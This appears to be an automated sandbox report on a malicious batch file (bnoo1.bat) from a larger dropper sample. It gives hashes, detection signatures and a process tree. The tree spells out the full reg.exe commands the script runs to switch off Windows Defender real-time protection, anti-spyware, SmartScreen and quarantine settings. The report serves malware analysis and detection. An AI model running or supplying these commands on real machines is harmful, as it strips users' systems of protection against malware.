Analysis

max time kernel: 121s
max time network: 122s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 05-12-2024 02:08
Behavioral tasks

behavioral1: 13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe (win7-20240903-en)
behavioral2: 13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe (win10v2004-20241007-en)
behavioral3: $PLUGINSDIR/SelfDel.dll (win7-20240903-en)
behavioral4: $PLUGINSDIR/SelfDel.dll (win10v2004-20241007-en)
behavioral5: $PLUGINSDIR/nsExec.dll (win7-20240903-en)
behavioral6: $PLUGINSDIR/nsExec.dll (win10v2004-20241007-en)
behavioral7: $_63_/PowerRun64.exe (win7-20240903-en)
behavioral8: $_63_/PowerRun64.exe (win10v2004-20241007-en)
behavioral9: $_63_/SetACL64.exe (win7-20240903-en)
behavioral10: $_63_/SetACL64.exe (win10v2004-20241007-en)
behavioral11: $_63_/acxxtzcogvgr.exe (win7-20240729-en)
behavioral12: $_63_/acxxtzcogvgr.exe (win10v2004-20241007-en)
behavioral13: $_63_/bn.bat (win7-20240903-en)
behavioral14: $_63_/bn.bat (win10v2004-20241007-en)
behavioral15: $_63_/bn1.bat (win7-20240903-en)
behavioral16: $_63_/bn1.bat (win10v2004-20241007-en)
behavioral17: $_63_/bnn.bat (win7-20241010-en)
behavioral18: $_63_/bnn.bat (win10v2004-20241007-en)
behavioral19: $_63_/bnoo1.bat (win7-20240903-en)
behavioral20: $_63_/bnoo1.bat (win10v2004-20241007-en)
behavioral21: $_63_/bnz.bat (win7-20240708-en)
behavioral22: $_63_/bnz.bat (win10v2004-20241007-en)
behavioral23: $_63_/dotNetFx40_Full_setup.exe (win7-20240903-en)
behavioral24: $_63_/dotNetFx40_Full_setup.exe (win10v2004-20241007-en)
behavioral25: $_63_/dotNetFx45_Full_setup.exe (win7-20240903-en)
behavioral26: $_63_/dotNetFx45_Full_setup.exe (win10v2004-20241007-en)
behavioral27: $_63_/win_version_csharp.exe (win7-20240729-en)
behavioral28: $_63_/win_version_csharp.exe (win10v2004-20241007-en)
General

Target: $_63_/bnoo1.bat
Size: 2KB
MD5: 1f89930c9e4fd56765ca2ac17e06817d
SHA1: cecb1c4a81dc27a6f4379ead464f418a1bf10ce9
SHA256: 2de693852c2127d52fe758bde2fa606d3adf5f4eb790f186797abc48e3e892e7
SHA512: 488f77ba07c40a27c3f76636fba2479146ce6aa0b6a4948677e4cc5a2937eae42f2b15c2bbf13ebb95cf3e2bd0ace5fa525072cb2bcd368571f8fe79eb6fcd1c
Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings

description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe

Suspicious use of WriteProcessMemory (64 IoCs)

Each row below is recorded three times in the report except the last, which is recorded once (64 entries in total).

description | pid | Process | procid_target | occurrences
PID 2612 wrote to memory of 340 | 2612 | cmd.exe | 31 | 3
PID 2612 wrote to memory of 2724 | 2612 | cmd.exe | 32 | 3
PID 2612 wrote to memory of 2728 | 2612 | cmd.exe | 33 | 3
PID 2612 wrote to memory of 1796 | 2612 | cmd.exe | 34 | 3
PID 2612 wrote to memory of 2084 | 2612 | cmd.exe | 35 | 3
PID 2612 wrote to memory of 2520 | 2612 | cmd.exe | 36 | 3
PID 2612 wrote to memory of 3016 | 2612 | cmd.exe | 37 | 3
PID 2612 wrote to memory of 2828 | 2612 | cmd.exe | 38 | 3
PID 2612 wrote to memory of 2268 | 2612 | cmd.exe | 39 | 3
PID 2612 wrote to memory of 2276 | 2612 | cmd.exe | 40 | 3
PID 2612 wrote to memory of 2508 | 2612 | cmd.exe | 41 | 3
PID 2612 wrote to memory of 2272 | 2612 | cmd.exe | 42 | 3
PID 2612 wrote to memory of 2480 | 2612 | cmd.exe | 43 | 3
PID 2612 wrote to memory of 2784 | 2612 | cmd.exe | 44 | 3
PID 2612 wrote to memory of 2792 | 2612 | cmd.exe | 45 | 3
PID 2612 wrote to memory of 2888 | 2612 | cmd.exe | 46 | 3
PID 2612 wrote to memory of 2904 | 2612 | cmd.exe | 47 | 3
PID 2612 wrote to memory of 2900 | 2612 | cmd.exe | 48 | 3
PID 2612 wrote to memory of 2908 | 2612 | cmd.exe | 49 | 3
PID 2612 wrote to memory of 3044 | 2612 | cmd.exe | 50 | 3
PID 2612 wrote to memory of 2796 | 2612 | cmd.exe | 51 | 3
PID 2612 wrote to memory of 2440 | 2612 | cmd.exe | 52 | 1
Processes

Depth 1:
C:\Windows\system32\cmd.exe
  command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\$_63_\bnoo1.bat"
  PID: 2612
  signatures: Suspicious use of WriteProcessMemory

  Depth 2 (children of PID 2612):

  C:\Windows\system32\reg.exe
    command line: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
    PID: 340

  C:\Windows\system32\reg.exe
    command line: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
    PID: 2724

  C:\Windows\system32\reg.exe
    command line: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
    PID: 2728

  C:\Windows\system32\reg.exe
    command line: reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
    PID: 1796

  C:\Windows\system32\reg.exe
    command line: reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f
    PID: 2084

  C:\Windows\system32\reg.exe
    command line: reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f
    PID: 2520

  C:\Windows\system32\reg.exe
    command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
    PID: 3016

  C:\Windows\system32\reg.exe
    command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f
    PID: 2828

  C:\Windows\system32\reg.exe
    command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f
    PID: 2268

  C:\Windows\system32\reg.exe
    command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f
    PID: 2276

  C:\Windows\system32\reg.exe
    command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f
    PID: 2508

  C:\Windows\system32\reg.exe
    command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
    PID: 2272

  C:\Windows\system32\reg.exe
    command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
    PID: 2480

  C:\Windows\system32\reg.exe
    command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t reg_DWORD /d "1" /f
    PID: 2784
    signatures: Modifies Windows Defender Real-time Protection settings

  C:\Windows\system32\reg.exe
    command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t reg_DWORD /d "1" /f
    PID: 2792
    signatures: Modifies Windows Defender Real-time Protection settings

  C:\Windows\system32\reg.exe
    command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t reg_DWORD /d "1" /f
    PID: 2888
    signatures: Modifies Windows Defender Real-time Protection settings

  C:\Windows\system32\reg.exe
    command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t reg_DWORD /d "1" /f
    PID: 2904
    signatures: Modifies Windows Defender Real-time Protection settings

  C:\Windows\system32\reg.exe
    command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t reg_DWORD /d "1" /f
    PID: 2900
    signatures: Modifies Windows Defender Real-time Protection settings

  C:\Windows\system32\reg.exe
    command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t reg_DWORD /d "1" /f
    PID: 2908
    signatures: Modifies Windows Defender Real-time Protection settings

  C:\Windows\system32\reg.exe
    command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t reg_DWORD /d "1" /f
    PID: 3044
    signatures: Modifies Windows Defender Real-time Protection settings

  C:\Windows\system32\reg.exe
    command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleDay" /t reg_DWORD /d "8" /f
    PID: 2796

  C:\Windows\system32\reg.exe
    command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleTime" /t reg_DWORD /d 0 /f
    PID: 2440

  C:\Windows\system32\reg.exe
    command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "AdditionalActionTimeOut" /t reg_DWORD /d 0 /f
    PID: 2748